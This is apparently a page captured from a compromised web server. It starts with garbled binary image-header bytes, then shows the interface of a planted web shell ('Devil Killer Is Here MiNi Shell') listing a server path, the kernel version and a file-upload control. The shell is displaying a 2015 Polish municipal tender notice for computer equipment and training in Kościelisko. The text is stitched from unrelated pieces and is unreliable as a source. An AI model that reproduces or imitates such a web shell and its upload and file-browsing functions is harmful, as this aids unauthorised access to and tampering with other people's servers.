JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150616/145212-N-2015.html

<p class="kh_header"><b>Kościelisko: Dostawa sprzętu  komputerowego wraz z oprogramowaniem , instalacją i konfi-guracją oraz  przeprowadzenie szkoleń z zakresu obsługi komputera i Internetu               w ramach  realizacji projektu Zapewnienie dostępu do Internetu dla osób zagro-żonych wykluczeniem cyfrowym w Gminie Kościelisko współfinansowanego z  Programu Operacyjnego  Innowacyjna Gospodarka 8 Oś Priorytetowa: Społe-czeństwo informacyjne - zwiększenie innowacyjności gospodarki. Działanie 8.3 Przeciwdziałanie wykluczeniu - elnclusion</b><br>
<b>Numer ogłoszenia: 145212 - 2015; data zamieszczenia: 16.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kościelisko , ul. Strzelców Podhalańskich 44, 34-511 Kościelisko, woj. małopolskie, tel. 018 2079100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koscielisko.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu  komputerowego wraz z oprogramowaniem , instalacją i konfi-guracją oraz  przeprowadzenie szkoleń z zakresu obsługi komputera i Internetu               w ramach  realizacji projektu Zapewnienie dostępu do Internetu dla osób zagro-żonych wykluczeniem cyfrowym w Gminie Kościelisko współfinansowanego z  Programu Operacyjnego  Innowacyjna Gospodarka 8 Oś Priorytetowa: Społe-czeństwo informacyjne - zwiększenie innowacyjności gospodarki. Działanie 8.3 Przeciwdziałanie wykluczeniu - elnclusion.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa zestawów komputerowych oraz przeszkolenie beneficjentów ostatecznych  w ramach realizacji projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka Priorytet: VIII. Społeczeń-stwo informacyjne - zwiększanie innowacyjności gospodarki Działanie: 8.3. Przeciwdziałanie wykluczeniu cyfro-wemu - eInclusion.
Przedmiot zamówienia obejmuje: 
ETAP I dostawa fabrycznie nowego sprzętu komputerowego zgodnie ze specyfikacją określoną w załączniku nr 1 do SIWZ do: gospodarstw domowych - zestawy komputerowe obejmujące: komputer stacjonarny z systemem opera-cyjnym, monitor, klawiatura, myszka, drukarka, pakiet biurowy, program zabezpieczający - program antywiru-sowy, które zostaną użyczone nieodpłatnie Beneficjentom Ostatecznym (gospodarstwom domowym wytypowa-nym do udziału w projekcie przez Zamawiającego)20 sztuk zestawów komputerowych stacjonarnych z systemem operacyjnym20 szt. monitor 20 szt. klawiatura20 szt. myszka 20 sztuk drukarek20 szt. pakiet biurowy 20 szt. program zabezpieczający - program antywirusowyPrzedmiot zamówienia obejmuje także:transport w miejsca wskazane przez zamawiającego- teren Gminy Kościelisko (szczegółowy wykaz adresów zo-stanie przekazany Wykonawcy w dniu podpisania umowy) ,  instalację, konfigurację  i uruchomienie dostarczo-nego sprzętu komputerowegoudzielenie gwarancji na okres co najmniej 60 miesięcy od dnia ostatecznego odbioru przedmiotu zamówienia- zgodnie z warunkami określonymi w załączniku nr 8 do SIWZ  wzór karty gwarancyjnejudzielenie wsparcia technicznego oraz świadczenie serwisu w okresie 60 miesięcy od dnia ostatecznego odbioru przedmiotu umowy,  polegające na udzielaniu doradztwa i wsparcia użytkownikom we wszelkich kwestiach do-tyczących użytkowania sprzętu - za pośrednictwem różnych środków komunikacji (infolinia telefoniczna, zgło-szenia internetowe) - rozmowę telefoniczną z Użytkownikiem i udzielenie wskazówek prowadzących do rozwią-zania problemu,  rozwiązanie problemu, w przypadku braku możliwości usunięcia usterki zdalnie, wykonawca ustala termin wizyty z użytkownikiem i dokonuje usunięcia usterki problemu na miejscu. Usterka musi być usu-nięta w ciągu dwóch dni roboczych. Uwagi do przedmiotu zamówienia:Zamawiający wymaga, aby dostarczony sprzęt był fabrycznie nowy nie może nosić znamion użycia, musi być sprawny i posiadać wyposażenie niezbędne do funkcjonalnego działania oraz musi spełniać normy energoosz-czędności.Poszczególne części składowe stanowiące przedmiot zamówienia winne być ze sobą kompatybilne. Wykonawca dokona instalacji, konfiguracji sprzętu komputerowego wraz z wymaganym oprogramowaniem tak aby był on gotowy do pracy po przekazaniu beneficjentowi ostatecznemu i aby nie była konieczna ingerencja Za-mawiającego. Koszty opłat ponosi wykonawca i są one wliczone w cenę ogólną. Wszystkie programy wymagające aktywizacji winny być aktywowane najpóźniej w momencie uruchomienia. Wykonawca zobowiązany jest do zainstalowania wymaganego w SIWZ oprogramowania oraz konfiguracji i uru-chomienia sprzętuWykonawca jest zobowiązany, po wykonaniu przedmiotu zamówienia,  do przekazania Zamawiającemu komple-tu oprogramowania i sterowników do zestawów komputerowych, licencji dla wymaganego oprogramowania, a także niezbędnych do instalacji oprogramowania i jego legalnego użytkowania kluczy sprzętowych, numerów se-ryjnych, kodów aktywacyjnych i innych- każdy komplet opisany - informujący co najmniej o dacie, miejscu- adre-sie wykonanej usługi. Wszystkie nazwy ujęte w SIWZ i jej załącznikach odnoszą się do zastosowania równoważnych lub zamiennych klas, typów, firm jednak o nie gorszych parametrach technicznych Do oferty należy załączyć dokumenty określa-jące parametry techniczne elementów zastosowanych jako równoważne. Zastosowane elementy jako równoważne muszą posiadać certyfikaty bezpieczeństwa. Równoważność oznacza, że przedmiot zamówienia, zaoferowany przez Wykonawcę, posiada wszystkie cechy techniczne i jakościowe przedmiotu określonego przez Zamawiają-cego a różni się od niego znakiem towarowym, patentem lub pochodzeniem. Jako równoważne Zamawiający uzna produkty: - których jakość jest zgodna z wymaganiami normowymi, atestami, świadectwami; dopuszczenia produktów opisanych przez Zamawiającego;  o takim samym przeznaczeniu;   tożsame tematycznie;  które nie obniżą określonych w opisie przedmiotu zamówienia standardów;  które mają wymiary liczbę elementów wska-zane przez Zamawiającego.Opakowanie oraz sprzęt komputerowy muszą posiadać numery seryjne, które zostaną przypisane konkretnemu użytkownikowi końcowemu. Wykonawca wraz ze sprzętem dostarczy listę numerów seryjnych dostarczonych urządzeń w wersji papierowej i elektronicznej. Wymagania ogólne dla wszystkich urządzeń informatycznych:  Wszystkie oferowane urządzenia muszą być fabrycznie nowe. Wszystkie oferowane urządzenia muszą być wyprodukowane zgodnie z obowiązującymi normami jakości Urządzenia muszą być dostarczone Zamawiającemu w oryginalnych opakowaniach fabrycznych. Do każdego urządzenia musi być dostarczony komplet standardowej dokumentacji w formie papierowej 		lub elektronicznej. Do każdego urządzenia musi być dostarczony komplet nośników umożliwiających odtworzenie oprogramowania zainstalowanego w urządzeniu. 
Wszystkie urządzenia zostaną dostarczone z niezbędnym okablowaniem zasilającym i transmisyjnym.Źródło współfinansowania: Europejski Fundusz Rozwoju Regionalnego w ramach Programu Operacyjnego In-nowacyjna Gospodarka, 8. Oś Priorytetowa: Społeczeństwo informacyjne - zwiększanie innowacyjności gospo-darki, Działanie 8.3 Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion. ETAP II
organizacja i przeprowadzenie  szkoleń z obsługi komputera i Internetu dla beneficjentów indywidualnych - 20 osób - przeprowadzenie szkoleń stacjonarnych dla gospodarstw domowych, które otrzymają zestawy kompute-rowe- warsztaty Podstawy systemu operacyjnego i Internetu po 20 godz. dla 20 osób w grupach do 10 osób- tj. łącznie 2 grupy po 20 godzin, tj. 40 godz.  obejmujące podstawowe informacje z zakresu obsługi komputera, edy-tora tekstu, przeglądarki internetowej, możliwości korzystania z e-usług. W ramach szkoleń Wykonawca przekaże osobom biorącym w nich udział materiały szkoleniowe i informacyjne. Szkolenia odbywać się będą w jednostkach podległych - pracowniach szkolnych trzech szkół biorących udział w projekcie na sprzęcie zakupionym w ramach realizacji niniejszego projektu.
Szczegółowy opis przedmiotu zamówienia opisany został w załączniku nr 1 do SIWZ. 
Uwagi do przedmiotu zamówienia:
Zamawiający wymaga, materiały szkoleniowe i informacyjne były nowe
Wszystkie nazwy ujęte w SIWZ i jej załącznikach odnoszą się do zastosowania równoważnych lub zamiennych klas, typów, firm jednak o nie gorszych parametrach technicznych Do oferty należy załączyć dokumenty określa-jące parametry techniczne elementów zastosowanych jako równoważne. Zastosowane elementy jako równoważne muszą posiadać certyfikaty bezpieczeństwa. Równoważność oznacza, że przedmiot zamówienia, zaoferowany przez Wykonawcę, posiada wszystkie cechy techniczne i jakościowe przedmiotu określonego przez Zamawiają-cego a różni się os niego znakiem towarowym, patentem lub pochodzeniem. Jako równoważne Zamawiający uzna produkty: - których jakość jest zgodna z wymaganiami normowymi, atestami, świadectwami; dopuszczenia pro-duktów opisanych przez Zamawiającego;  o takim samym przeznaczeniu;   tożsame tematycznie;  które nie obniżą określonych w opisie przedmiotu zamówienia standardów;  które mają wymiary liczbę elementów wskazane przez Zamawiającego.Wykonawca może wykonać przedmiotowe zamówienie przy udziale podwykonawców, zawierając z nimi sto-sowne umowy w formie pisemnej pod rygorem nieważności. W przypadku, gdy wykonawca przewiduje udział podwykonawców w realizacji zamówienia zobowiązany jest to wskazać w formularzu oferty oraz podać zakres zamówienia, który zostanie powierzony podwykonawcy. 
Źródło współfinansowania: Europejski Fundusz Rozwoju Regionalnego w ramach Programu Operacyjnego In-nowacyjna Gospodarka, 8. Oś Priorytetowa: Społeczeństwo informacyjne - zwiększanie innowacyjności gospo-darki, Działanie 8.3 Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.00.00-0, 48.31.00.00-4, 72.61.10.00-6, 51.60.00.00-8, 45.31.43.20-0, 48.62.00.00-0, 48.62.40.00-8, 50.31.20.00-5, 50.30.00.00-8, 80.53.31.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do przetargu Wykonawcy zobowiązani są wnieść wadium w wysokości: 1 800,00 zł (słownie: jeden tysiąc  osiemset złotych 0-100).
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275, z późniejszymi zmianami).
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem z rachunku bankowego Wykonawcy na rachunek bankowy Zamawiającego: PBS o Zakopane numer rachunku 03 8821-0009-0000-0000-1443-0006 (z dopiskiem wadium przetar-gowe   ZP.271-37-2015).
4.	Wadium należy wnieść przed upływem terminu składania ofert tj. do dnia 25 czerwca 2015 roku do godz. 10.00. (De-cyduje data uznania wpłaty na rachunku Zamawiającego).
5.	Wadium musi obejmować okres związania ofertą.
6.	Oferta, która nie będzie zabezpieczona akceptowaną przez Zamawiającego formą wadium zostanie wykluczona z postępowania przetargowego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek, jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych według wzoru stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej :,  
- dwie dostawy sprzętu komputerowego wraz z jego instalacją o wartości nie mniejszej niż 60 000,00 zł brutto każda. 
     	       Wykaz należy przygotować wg wzoru stanowiącego załącznik nr 5 do SIWZ, należy także załączyć dowody czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek, jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych według wzoru stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek, jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych według wzoru stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek, jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy prawo za-mówień publicznych według wzoru stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają wymaganiom określonym przez zamawiającego należy złożyć następujące dokumenty:
	1) Dokumenty dotyczące komputerów stacjonarnych, które należy załączyć do oferty: 
	a) Procesor: Dokumentem potwierdzającym spełnianie wymagań określonych w pkt 1 w tabeli będzie dołączony do 	oferty wydruk raportu z oprogramowania testującego lub wydruk zawartości ekranu [Print Screen ekranu] z prze	prowadzonych testów, potwierdzony za zgodność z oryginałem przez Wykonawcę, 
	b) Karta grafiki : Dokumentem potwierdzającym spełnianie wymagań określonych w pkt 5 w tabeli będzie dołączony 	do oferty wydruk raportu z oprogramowania testującego lub wydruk zawartości ekranu [Print Screen ekranu] z prze	prowadzonych testów, potwierdzony za zgodność z oryginałem przez Wykonawcę, 
	c)  Deklaracja producenta spełnienia przez sprzęt wymaganych norm CE 
	d) Certyfikat Energy Star - komputer musi spełniać wymogi Energy Star co najmniej 5.0 lub dokumenty równoważne np. 	wydruk ze strony internetowej przykładowo www.eu-energystar.org lub www.energystar.gov.

	2) Dokumenty dotyczące monitorów, które należy załączyć do oferty:
	a) Certyfikat spełniania normy jakościowej TCO 06, lub TCO 03, lub TCO 99 - lub równoważne 
	b) Deklaracja producenta spełnienia przez sprzęt wymaganych norm CE 
	c) Certyfikat Energy Star - komputer musi spełniać wymogi Energy Star co najmniej 5.0 lub dokumenty równoważne np. 	wydruk ze strony internetowej przykładowo www.eu-energystar.org lub www.energystar.gov.

	3) Dokumenty drukarek , które należy załączyć do oferty:
	a)  Deklaracja producenta spełnienia przez sprzęt wymaganych norm CE 
	b) Certyfikat Energy Star -musi spełniać wymogi Energy Star co najmniej 2.0 lub dokumenty równoważne np. 	wydruk ze strony internetowej przykładowo www.eu-energystar.org lub www.energystar.gov
	c) dokumenty poświadczające, że sprzęt jest produkowany zgodnie z normami ISO 9001 oraz ISO   14001 lub równo	ważnymi</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji zamówienia - etap I w zakresie dostaw, instalacji, konfiguracji  i uruchomienia dostarczonego sprzętu komputerowego - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą być dokonywane w przypadku gdy takie założenie było dopuszczone w postępowaniu o udzielenie zamówienia będącym podstawą do zawarcia niniejszej umowy. Zmiany umowy mogą być dokonywane na następujących zasadach:
1.	W przypadku ustawowej zmiany podatku od towarów i usług
2.	W przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10   października 2002r. o minimalnym wynagrodzeniu za pracę.
3.	W przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zwrotne .
	   jeżeli zmiany określone w ust. 1,2,3 będą miały wpływ na koszty wykonania przez wykonawcę zamówienia 	    Publicznego, każda ze stron umowy, może zwrócić się do drugiej strony o przeprowadzenie negocjacji w 	    sprawie odpowiedniej zmiany wynagrodzenia. Strona wnioskująca zobowiązana jest racjonalnie wykazać  	    w jakim stopniu zaistniałe ww. zmiany mają wpływ na koszt wykonania zamówienia.
4.	W przypadku zmiany danych teleadresowych, osób reprezentujących firmę, kluczowych specjalistów  przedstawio-nych w umowie - na wniosek Zamawiającego lub Wykonawcy.
5.	Zmian podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy. 
6.	Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy.
7.	Zmiany terminu dokonania odbioru przewidzianych w umowie, 
8.	Siły wyższej,
9.	W przypadku zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy.
10.	W przypadku gdy zmiany treści umowy są korzystne dla Zamawiającego a Wykonawca nie wyrazi sprzeciwu co do wprowadzenia tych zmian.
11.	Zamawiający zastrzega sobie możliwość zmiany beneficjentów ostatecznych w trakcie trwania umowy- w takim przy-padku Wykonawca będzie zobowiązany do przeniesienia, montażu, uruchomienia i konfiguracji zestawu kompute-rowego pod nowym wskazanym adresem na terenie Gminy Kościelisko- w terminie 5 dni roboczych od daty zgłosze-nia zmiany.
12.	zmiana sposobu spełnienia świadczenia (rozwiązania zamienne) będzie możliwa w przypadku koniczności zmiany sprzętu, urządzeń, w sytuacji gdy wykorzystanie sprzętu urządzeń wskazanych w dokumentacji lub ofercie stanie się niemożliwe z powodu zaprzestania produkcji, wycofania z rynku lub zastąpienia innymi; powyższa zmiana umowy jest dopuszczalna pod warunkiem zmiany na materiały, urządzenia i sprzęt, posiadające co najmniej takie parametry jakościowe i cechy użytkowe jak te, które stanowiły podstawę wyboru oferty pod warunkiem niezwiększenia ceny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
